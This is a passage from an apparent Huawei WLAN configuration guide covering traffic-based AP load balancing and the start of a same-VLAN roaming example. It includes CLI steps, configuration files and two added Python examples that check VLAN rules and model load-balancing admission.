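The VLAN rules in the notes above (tunnel forwarding needs distinct management and service VLANs, the network between AC and APs must carry the management VLAN, and the network towards the upstream side must carry the service VLAN) can be checked mechanically against a saved configuration. The following Python checker is an added example, not Huawei code or a Huawei tool: it parses the configuration-file format shown under "Configuration Files" in these examples, indented as the device prints it. The sample configuration is constructed to mirror the AC configuration of this example; the assumptions that the management VLAN is the VLANIF named by the CAPWAP source interface and that a service set with no forward-mode line uses direct forwarding are the author's, not statements from the guide.

```python
"""Checks the VLAN rules from the Configuration Notes against a saved AC
configuration in the "Configuration Files" format, indented as the device
prints it (added example, not Huawei code). Assumptions: the management VLAN
is the VLANIF named by the CAPWAP source interface ("wlan ac source interface"
in V200R005/V200R006, "capwap source interface" in V200R007/V200R008), and a
service set with no forward-mode line uses direct forwarding and service VLAN 1."""
import re

SOURCE_IF_RE = re.compile(r"^\s*(?:wlan ac|capwap) source interface vlanif\s*(\d+)")
SS_KEYS = (("forward_mode", r"forward-mode (\S+)"),
           ("service_vlan", r"service-vlan (\d+)"),
           ("wlan_ess", r"wlan-ess (\d+)"))

def parse_vlan_list(spec):
    """'100 to 101 200' -> {100, 101, 200} (port trunk allow-pass syntax)."""
    vlans, tok, i = set(), spec.split(), 0
    while i < len(tok):
        if i + 2 < len(tok) and tok[i + 1] == "to":
            vlans.update(range(int(tok[i]), int(tok[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tok[i]))
            i += 1
    return vlans

def parse_config(text):
    """Collect the source-interface VLAN, the VLANs each interface carries and the
    forwarding mode / service VLAN / WLAN-ESS binding of each service set."""
    cfg = {"mgmt_vlan": None, "interfaces": {}, "service_sets": {}}
    cur_if = cur_ss = None
    ss_indent = 0
    for raw in text.splitlines():
        line, indent = raw.strip(), len(raw) - len(raw.lstrip())
        if not line or line == "#":                      # '#' closes a top-level block
            cur_if = cur_ss = None
        elif m := SOURCE_IF_RE.match(raw):
            cfg["mgmt_vlan"] = int(m.group(1))
        elif m := re.match(r"interface (\S+)$", line):
            cur_if = m.group(1)
            cfg["interfaces"][cur_if] = {"trunk": False, "vlans": set()}
        elif cur_if:
            if line == "port link-type trunk":
                cfg["interfaces"][cur_if]["trunk"] = True
            if m := re.match(r"port trunk allow-pass vlan (.+)", line):
                cfg["interfaces"][cur_if]["vlans"] |= parse_vlan_list(m.group(1))
        elif m := re.match(r"service-set name (\S+)", line):
            cur_ss, ss_indent = m.group(1), indent
            cfg["service_sets"][cur_ss] = {"forward_mode": "direct-forward",
                                           "service_vlan": 1, "wlan_ess": None}
        elif cur_ss and indent > ss_indent:              # child line of the service set
            for key, pat in SS_KEYS:
                if m := re.match(pat, line):
                    cfg["service_sets"][cur_ss][key] = (
                        m.group(1) if key == "forward_mode" else int(m.group(1)))
        else:
            cur_ss = None
    return cfg

def check(cfg):
    """Return a list of findings; an empty list means the VLAN rules hold."""
    mgmt, out = cfg["mgmt_vlan"], []
    if mgmt is None:
        return ["no CAPWAP source interface (management VLAN) configured"]
    trunks = [d for n, d in cfg["interfaces"].items()
              if d["trunk"] and not n.startswith("Wlan-Ess")]
    if not any(mgmt in d["vlans"] for d in trunks):
        out.append(f"management VLAN {mgmt} is not carried by any physical trunk")
    for name, ss in cfg["service_sets"].items():
        svc, tunnel = ss["service_vlan"], ss["forward_mode"] == "tunnel"
        if tunnel and svc == mgmt:
            out.append(f"service-set {name}: tunnel forwarding with service VLAN {svc} equal to management VLAN")
        ess = cfg["interfaces"].get(f"Wlan-Ess{ss['wlan_ess']}")
        if ss["wlan_ess"] is not None and (ess is None or svc not in ess["vlans"]):
            out.append(f"service-set {name}: Wlan-Ess{ss['wlan_ess']} does not allow service VLAN {svc}")
        if tunnel and not any(svc in d["vlans"] for d in trunks):
            out.append(f"service-set {name}: service VLAN {svc} is not carried by any physical trunk")
    return out

# Constructed sample mirroring the AC configuration file of this example.
GOOD_CONFIG = """\
#
vlan batch 100 to 101
#
interface GigabitEthernet1/0/1
 port link-type trunk
 port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
 port link-type trunk
 port trunk allow-pass vlan 101
#
interface Wlan-Ess1
 port trunk allow-pass vlan 101
#
wlan
 wlan ac source interface vlanif100
 service-set name test id 1
  forward-mode tunnel
  wlan-ess 1
  ssid test
  service-vlan 101
#
return
"""
# The same configuration with the service VLAN mistakenly set to the management VLAN.
BAD_CONFIG = GOOD_CONFIG.replace("service-vlan 101", "service-vlan 100")
```

Running check(parse_config(GOOD_CONFIG)) returns no findings; the BAD_CONFIG variant produces two, one for the service VLAN colliding with the management VLAN under tunnel forwarding and one because Wlan-Ess1 still only allows VLAN 101.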

Networking Requirements
As shown in Figure 15-9, AP1 and AP2 connecting to the AC through SwitchA are dual-band
APs and join AP region 10. STAs in AP region 10 support 2.4 GHz and 5 GHz frequency
bands. Both 2.4 GHz and 5 GHz WLANs need to be deployed in AP region 10.

When a large number of STAs access the Internet through the same AP, the AP is heavily
loaded, reducing WLAN service quality. The enterprise wants STAs to be balanced on the two
APs to prevent one AP from being heavily loaded.


Figure 15-9 Networking for configuring traffic-based dynamic load balancing

[Figure: the AC reaches the Internet through its uplink GE1/0/3 (VLAN 101) and connects through GE1/0/1 (VLAN 100) to GE0/0/3 of SwitchA. SwitchA connects to AP1 on GE0/0/1 and to AP2 on GE0/0/2, both in VLAN 100. STA1 to STA4 associate with the dual-band APs AP1 and AP2.]

Management VLAN: VLAN 100
Service VLAN: VLAN 101
AP region ID: 10

Data Planning

Table 15-22 Data required for completing the configuration

Item | Data | Description
IP address of the AC's source interface | 192.168.10.1/24 | None
WMM profile | Name: wmm | None
Radio profile | Name: radio | None
Security profile | Name: security; security and authentication policy: WPA2+PSK; authentication key: huawei123; encryption mode: CCMP | None
Traffic profile | Name: traffic | None
Service set | Name: test; SSID: test; WLAN virtual interface: WLAN-ESS 1; data forwarding mode: tunnel forwarding | None
DHCP server | The AC functions as the DHCP server to assign IP addresses to APs and STAs. | None
AP gateway and IP address range | VLANIF 100: 192.168.10.1/24; 192.168.10.2 to 192.168.10.254/24 | None
STA gateway and IP address range | VLANIF 101: 192.168.11.1/24; 192.168.11.2 to 192.168.11.254/24 | None
MAC addresses of APs | AP1: 60de-4476-e360; AP2: dcd2-fc04-b500 | None

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the WLAN service so that users can connect to the Internet through the
WLAN.
2. Configure traffic-based dynamic load balancing to prevent new STAs from associating
with heavily-loaded APs.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Add AC's uplink interface GE1/0/3 to VLAN 101.
[AC] vlan batch 101
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/3] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs.
# Configure a DHCP server to assign IP addresses to the APs from the IP address pool on
VLANIF 100 and assign IP addresses to STAs from the IP address pool on VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage APs on the AC.


# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------


17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting) and add
the APs offline by AP type ID. In this example AP1 and AP2 are AP6010DN-AGN (type ID 19)
with MAC addresses 60de-4476-e360 and dcd2-fc04-b500. Note that MAC authentication only
checks a source address that any device on VLAN 100 can spoof; where the AP serial numbers
are known in advance, SN authentication (ap-auth-mode sn-auth) gives the AC a stronger
check on which devices may join.
[AC-wlan-view] ap-auth-mode mac-auth
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10.
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add APs to region 10.
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2

Step 6 Configure WLAN service parameters.

# Create a WMM profile named wmm and retain the default settings in the profile.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
Set the channel mode to fixed.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode to fixed. The default value is auto.
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create WLAN-ESS interface 1.


[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101
[AC-Wlan-Ess1] quit

# Create a security profile named security. The pass-phrase huawei123 is only a placeholder
for this example: a WPA2-PSK pass-phrase can be recovered offline by dictionary attack from a
captured 4-way handshake, so use a long random pass-phrase (or 802.1X authentication) on a
production network.

[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Use PSK authentication with CCMP (AES) encryption.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default settings in the profile.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Create a service set named test and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set.
[AC-wlan-view] service-set name test id 1
[AC-wlan-service-set-test] ssid test //Name the SSID test.
[AC-wlan-service-set-test] wlan-ess 1
[AC-wlan-service-set-test] security-profile name security
[AC-wlan-service-set-test] traffic-profile name traffic
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set to 101. The default value is 1.
[AC-wlan-service-set-test] forward-mode tunnel //Set the service forwarding mode to tunnel forwarding.
[AC-wlan-service-set-test] quit

Step 7 Configure VAPs and deliver VAP parameters to APs.


# Configure VAPs.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio //Bind the radio profile to a radio.
[AC-wlan-radio-1/0] channel 20mhz 11 //Set the working channel of the radio to 11 and the channel bandwidth to 20 MHz.
[AC-wlan-radio-1/0] service-set name test //Bind the service set to the radio.
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 1 radio 1
[AC-wlan-radio-1/1] radio-profile name radio
[AC-wlan-radio-1/1] channel 40mhz-plus 157 //Set the working channel of the radio to 157 and the channel bandwidth to 40 MHz Plus.
[AC-wlan-radio-1/1] service-set name test
[AC-wlan-radio-1/1] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] channel 20mhz 6
[AC-wlan-radio-2/0] service-set name test
[AC-wlan-radio-2/0] quit


[AC-wlan-view] ap 2 radio 1
[AC-wlan-radio-2/1] radio-profile name radio
[AC-wlan-radio-2/1] channel 40mhz-plus 149
[AC-wlan-radio-2/1] service-set name test
[AC-wlan-radio-2/1] quit

Step 8 Configure dynamic load balancing.


[AC-wlan-view] sta-load-balance enable //Enable dynamic load balancing.
[AC-wlan-view] sta-load-balance mode traffic //Configure traffic-based dynamic load balancing.
[AC-wlan-view] sta-load-balance traffic gap 25 //Set the load difference threshold to 25%. The default value is 20%.
[AC-wlan-view] sta-load-balance associate-threshold 10 //Set the number of times a STA's association request may be rejected before the AC admits it to 10. The default value is 6.
[AC-wlan-view] commit ap 1 //Commit the configuration.
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y
[AC-wlan-view] quit

Step 9 Verify the configuration.


l After the preceding configuration is complete, STAs can discover the WLAN with SSID
test.
l You can run the display sta-load-balance config command on the AC to check the
dynamic load balancing configuration.
[AC] display sta-load-balance config
Sta-load-balance config:
------------------------------------------------------------------------------
Sta-load-balance enable                  : Yes
Sta-load-balance mode                    : Traffic
Sta-load-balance session gap threshold   : 4
Sta-load-balance traffic gap threshold   : 25
Sta-load-balance associate threshold     : 10
------------------------------------------------------------------------------

l When a new STA requests to associate with one of the four VAPs in AP region 10 (two
radios on each of the two dual-band APs), the AC uses the dynamic load balancing
algorithm to decide whether to admit it. If the traffic load of the requested VAP exceeds
that of the least-loaded VAP by more than 25%, the AC rejects the association request. If
the STA continues sending association requests to that VAP more than 10 times, the AC
allows it to associate.
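The admission rule described above for traffic-based dynamic load balancing, and the session-based rule in Step 9 of the static load balancing example (15.8.2), modelled in Python. This is an added example, not Huawei code or command output: the AC's actual algorithm is not published in this guide, so the model only reproduces the documented behaviour (a gap threshold on the load difference and an associate-threshold retry counter per STA). The radio capacities from which load percentages are derived, the per-radio loads, the STA MAC addresses and the fixed group membership used for the traffic mode are constructed assumptions.

```python
"""Model of the AC's load balancing admission decision (added example, not
Huawei code). It reproduces the documented rule only: an association request
to a radio is rejected while that radio's load exceeds the least-loaded radio
in the group by more than the gap threshold, until the same STA has been
rejected associate-threshold times; its next request is then admitted.
Assumptions: load is a percentage of an assumed radio capacity (max_sessions
for the session metric, capacity_kbps for the traffic metric), and the
traffic-based group has a fixed member list instead of being formed from the
APs that report the STA."""
from dataclasses import dataclass, field


@dataclass
class Radio:
    ap_id: int
    radio_id: int
    sessions: int = 0               # associated STAs (session-based metric)
    traffic_kbps: float = 0.0       # current air-interface throughput (traffic-based metric)
    max_sessions: int = 64          # assumed capacity
    capacity_kbps: float = 54000.0  # assumed capacity

    def load_percent(self, mode):
        if mode == "session":
            return 100.0 * self.sessions / self.max_sessions
        if mode == "traffic":
            return 100.0 * self.traffic_kbps / self.capacity_kbps
        raise ValueError(f"unknown load balancing mode {mode!r}")


@dataclass
class LoadBalanceGroup:
    mode: str                  # "session" (static group) or "traffic" (dynamic)
    gap: float                 # load difference threshold in percent
    associate_threshold: int   # rejections tolerated before the STA is admitted
    members: list = field(default_factory=list)
    rejections: dict = field(default_factory=dict)   # (sta, ap, radio) -> count

    def decide(self, sta_mac, radio):
        """Return 'accept' or 'reject' for one association request."""
        if radio not in self.members:
            return "accept"                      # radio is not load balanced
        lightest = min(m.load_percent(self.mode) for m in self.members)
        diff = radio.load_percent(self.mode) - lightest
        key = (sta_mac, radio.ap_id, radio.radio_id)
        if diff > self.gap and self.rejections.get(key, 0) < self.associate_threshold:
            self.rejections[key] = self.rejections.get(key, 0) + 1
            return "reject"
        self.rejections.pop(key, None)           # admitted: retry counter reset
        if self.mode == "session":
            radio.sessions += 1                  # the new association adds load
        return "accept"


def simulate_static_example():
    """Group huawei from 15.8.2: AP1 radio 0 already carries 40 sessions, AP2
    radio 0 carries 10; gap 5%, associate-threshold 10 (constructed loads)."""
    ap1, ap2 = Radio(1, 0, sessions=40), Radio(2, 0, sessions=10)
    group = LoadBalanceGroup("session", gap=5, associate_threshold=10, members=[ap1, ap2])
    # STA1 insists on AP1 (stronger signal) and retries eleven times.
    sta1 = [group.decide("0011-2233-4455", ap1) for _ in range(11)]
    # STA2 asks the lightly loaded AP2 and is admitted at once.
    sta2 = group.decide("0011-2233-4456", ap2)
    return sta1, sta2


def simulate_dynamic_example():
    """Four VAPs of the two dual-band APs in region 10; AP1's 5 GHz radio is
    saturated; traffic gap 25%, associate-threshold 10 (constructed loads)."""
    radios = [Radio(1, 0, traffic_kbps=12000), Radio(1, 1, traffic_kbps=40000),
              Radio(2, 0, traffic_kbps=9000), Radio(2, 1, traffic_kbps=15000)]
    group = LoadBalanceGroup("traffic", gap=25, associate_threshold=10, members=radios)
    on_ap1_5g = group.decide("aabb-ccdd-eeff", radios[1])   # 74.1% vs 16.7% lightest
    on_ap2_5g = group.decide("aabb-ccdd-eeff", radios[3])   # 27.8% vs 16.7% lightest
    return on_ap1_5g, on_ap2_5g
```

simulate_static_example() returns ten "reject" decisions followed by one "accept" for the STA that keeps asking the heavily loaded AP1, and an immediate "accept" for the STA that asks AP2; simulate_dynamic_example() rejects the STA on AP1's saturated 5 GHz radio and accepts it on AP2's 5 GHz radio, whose load is within 25% of the lightest VAP.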

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 100
 port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
 port link-type trunk
 port trunk allow-pass vlan 100
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 101
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 101
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 210235419610CB002287
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 210235555310CC000094
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
sta-load-balance enable
sta-load-balance mode traffic
sta-load-balance traffic gap 25
sta-load-balance associate-threshold 10
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1


channel 20MHz 11
service-set id 1 wlan 1
ap 1 radio 1
radio-profile id 1
channel 40MHz-plus 157
service-set id 1 wlan 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
service-set id 1 wlan 1
ap 2 radio 1
radio-profile id 1
channel 40MHz-plus 149
service-set id 1 wlan 1
#
return

15.9 Configuring WLAN Roaming


15.9.1 Example for Configuring Non-Fast Roaming Between APs in the Same Service VLAN
Roaming Between APs in the Same Service VLAN Overview
WLAN roaming allows an STA to move from the coverage area of an AP to that of another
AP with nonstop service transmission. Roaming between APs in the same service VLAN
allows an STA to move between two APs that connect to the same AC and belong to the same
service VLAN without service interruption.
Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when an STA uses a non-WPA2-802.1x
security policy. If an STA uses WPA2-802.1x but does not support fast roaming, the STA still
needs to complete 802.1x authentication before roaming between two APs. When the user
uses the WPA2-802.1x security policy and supports fast roaming, the user does not need to
perform 802.1x authentication again during roaming and only needs to perform key
negotiation. In this case, fast roaming reduces the roaming delay and improves the WLAN
service experience.

Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
l In direct forwarding mode, if the ARP entry of a user is not aged out in time on the
access device connected to the AP after the user roams, services of the user will be
temporarily interrupted. You are advised to enable STA address learning on the AC.
After the function is enabled, the AP will send a gratuitous ARP packet to the access
device so that the access device can update ARP entries in a timely manner. This ensures
nonstop service transmission during user roaming.
You can use either of the following methods to enable STA address learning according to
the version of your product:
– Versions earlier than V200R007C20 and V200R008: run the learn client ip-address
enable command in the service set view.


– V200R007C20: run the undo learn-client-address disable command in the VAP
profile view.
l If direct forwarding is used, configure port isolation on the interface that directly
connects to the APs. If port isolation is not configured, a large number of broadcast
packets will be transmitted in the VLANs, or WLAN users on different APs will be able to
communicate directly at Layer 2.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-23 Applicable products and versions

Software Version   Product Model   AP Model and Version
V200R005C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
V200R008C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN,
                                   AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
                                   AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN,
                                   AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
                                   V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-10, a department in a campus network deploys two APs that are
managed and controlled by an AC. The AC dynamically assigns IP addresses to the APs and
STAs. All users in the department belong to the same VLAN, that is, AP1 and AP2 use the
same service VLAN. The default security policy (WEP open system authentication) is used.
User data is forwarded through tunnels.
The department requires that services should not be interrupted when an STA moves from
AP1 to AP2.


Figure 15-10 Networking diagram for configuring non-fast roaming between APs in the same
service VLAN

[Figure 15-10: the Internet connects to the AC on GE1/0/3 (VLAN 101); the AC connects on GE1/0/1 (VLAN 100) to SwitchA GE0/0/3 (VLAN 100); SwitchA GE0/0/1 and GE0/0/2 (VLAN 100) connect AP1 and AP2, both with SSID test, on channel 1 and channel 6; the STA roams from AP1 to AP2. Management VLAN: VLAN 100. Service VLAN: VLAN 101.]

Data Planning

Table 15-24 Data planning

Item                                     Data                                                 Description
IP address of the AC's source interface  192.168.10.1/24                                      None
WMM profile                              Name: wmm                                            None
Radio profile                            Name: radio                                          None
Security profile                         Name: security                                       None
                                         Security and authentication policy: WPA2+PSK
                                         Authentication key: huawei123
                                         Encryption mode: CCMP
Traffic profile                          Name: traffic                                        None
Service set                              Name: test                                           None
                                         SSID: test
                                         WLAN virtual interface: WLAN-ESS 1
                                         Data forwarding mode: tunnel forwarding
DHCP server                              The AC functions as the DHCP server to assign IP     None
                                         addresses to APs and STAs.
AP gateway and IP address pool range     VLANIF 100: 192.168.10.1/24                          None
                                         192.168.10.2 to 192.168.10.254/24
STA gateway and IP address pool range    VLANIF 101: 192.168.11.1/24                          None
                                         192.168.11.2 to 192.168.11.254/24

Configuration Roadmap
The configuration roadmap is as follows:
1. The default security policy is used and access authentication is not required, which
shortens the roaming switchover time. Configure non-fast roaming between APs in the
same service VLAN to ensure nonstop service transmission during roaming.
2. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
3. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
APs.
4. Configure basic WLAN services to enable the STAs to connect to the WLAN.

Procedure
Step 1 Set the NAC mode on AC to unified mode (default setting). Configure SwitchA and the AC
so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA: add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2


[SwitchA-GigabitEthernet0/0/2] port link-type trunk


[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-gigabitethernet0/0/3] port link-type trunk
[SwitchA-gigabitethernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-gigabitethernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Add AC uplink interface GE1/0/3 to VLAN 101 (the service VLAN).
[AC] vlan batch 101
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101
[AC-GigabitEthernet1/0/3] quit

Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and the AP.
# Configure the AC as the DHCP server to allocate an IP address to the AP from the IP
address pool on VLANIF 100, and allocate IP addresses to STAs from the IP address pool on
VLANIF 101.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit

Step 4 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
